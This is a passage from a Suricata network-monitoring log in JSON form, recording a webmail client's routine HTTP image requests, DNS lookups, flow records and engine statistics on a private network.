Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386}} {"timestamp":"2020-02-29T00:21:17.588965+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.589306+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465}} {"timestamp":"2020-02-29T00:21:17.591842+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.592157+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:21:17.596746+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52944,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/data.png","state":"CLOSED","stored":false,"size":386,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.593362+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:21:17.594219+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.594991+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":3}} {"timestamp":"2020-02-29T00:21:17.595102+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:21:17.595491+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.595752+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/nag.png","state":"CLOSED","stored":false,"size":465,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.596037+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:21:17.597188+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":4}} {"timestamp":"2020-02-29T00:21:17.599969+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/add.png","state":"CLOSED","stored":false,"size":512,"tx_id":6}} {"timestamp":"2020-02-29T00:21:17.616058+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:21:17.617498+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":7}} {"timestamp":"2020-02-29T00:21:17.617787+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:21:17.641243+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:21:17.641296+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:21:17.641307+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:21:17.641313+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:21:18.000736+0000","flow_id":826028198060941,"event_type":"flow","src_ip":"192.168.10.122","src_port":59430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:17.582541+0000","end":"2020-02-29T00:16:17.690881+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:21.000858+0000","flow_id":553916250233715,"event_type":"flow","src_ip":"192.168.10.122","src_port":57167,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:20.105331+0000","end":"2020-02-29T00:16:20.214280+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:22.000726+0000","flow_id":345374128613512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1903,"bytes_toclient":3289,"start":"2020-02-29T00:20:16.927880+0000","end":"2020-02-29T00:20:21.988124+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:22.598751+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":3}} {"timestamp":"2020-02-29T00:21:22.600626+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":2}} {"timestamp":"2020-02-29T00:21:22.602835+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52944,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":1}} {"timestamp":"2020-02-29T00:21:22.602932+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":5}} {"timestamp":"2020-02-29T00:21:22.622869+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":8}} {"timestamp":"2020-02-29T00:21:23.000179+0000","event_type":"stats","stats":{"uptime":14935,"capture":{"kernel_packets":137495,"kernel_drops":0},"decoder":{"pkts":137587,"bytes":94288945,"invalid":193,"ipv4":136034,"ipv6":10,"ethernet":137587,"raw":0,"null":0,"sll":0,"tcp":130520,"udp":5306,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2846,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2862,"synack":2853,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1881,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2428,"failed_udp":114},"tx":{"http":4829,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2510}},"flow_mgr":{"closed_pruned":2822,"new_pruned":17,"est_pruned":2482,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20170,"memcap_state":0,"memcap_global":0},"http":{"memuse":19094,"memcap":0}}} {"timestamp":"2020-02-29T00:21:23.001653+0000","flow_id":1056805396477246,"event_type":"flow","src_ip":"192.168.10.81","src_port":52928,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:20:16.980286+0000","end":"2020-02-29T00:20:22.782309+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:27.000286+0000","flow_id":600409286444339,"event_type":"flow","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":28,"pkts_toclient":28,"bytes_toserver":5065,"bytes_toclient":22432,"start":"2020-02-29T00:20:13.591155+0000","end":"2020-02-29T00:20:26.906913+0000","age":13,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:29.000441+0000","flow_id":1047128820218052,"event_type":"flow","src_ip":"192.168.10.122","src_port":60209,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:28.391364+0000","end":"2020-02-29T00:16:28.496615+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:30.000158+0000","event_type":"stats","stats":{"uptime":14942,"capture":{"kernel_packets":137592,"kernel_drops":0},"decoder":{"pkts":137604,"bytes":94290019,"invalid":193,"ipv4":136049,"ipv6":10,"ethernet":137604,"raw":0,"null":0,"sll":0,"tcp":130535,"udp":5306,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2846,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2862,"synack":2853,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1881,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2428,"failed_udp":114},"tx":{"http":4829,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2510}},"flow_mgr":{"closed_pruned":2825,"new_pruned":17,"est_pruned":2482,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19839,"memcap_state":0,"memcap_global":0},"http":{"memuse":19014,"memcap":0}}} {"timestamp":"2020-02-29T00:21:31.925724+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41965,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45535,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:32.037252+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41965,"proto":"UDP","dns":{"type":"answer","id":45535,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:32.037252+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41965,"proto":"UDP","dns":{"type":"answer","id":45535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:32.193317+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7394}} {"timestamp":"2020-02-29T00:21:33.000202+0000","flow_id":291687022764127,"event_type":"flow","src_ip":"192.168.10.122","src_port":50780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:32.237663+0000","end":"2020-02-29T00:16:32.345816+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:33.000372+0000","flow_id":1852138835688518,"event_type":"flow","src_ip":"192.168.10.122","src_port":50103,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:32.015430+0000","end":"2020-02-29T00:16:32.120707+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:36.986166+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7394},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36206,"tx_id":0}} {"timestamp":"2020-02-29T00:21:36.998071+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38791,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16560,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:37.000143+0000","event_type":"stats","stats":{"uptime":14949,"capture":{"kernel_packets":137612,"kernel_drops":0},"decoder":{"pkts":137625,"bytes":94299770,"invalid":193,"ipv4":136070,"ipv6":10,"ethernet":137625,"raw":0,"null":0,"sll":0,"tcp":130554,"udp":5308,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2847,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_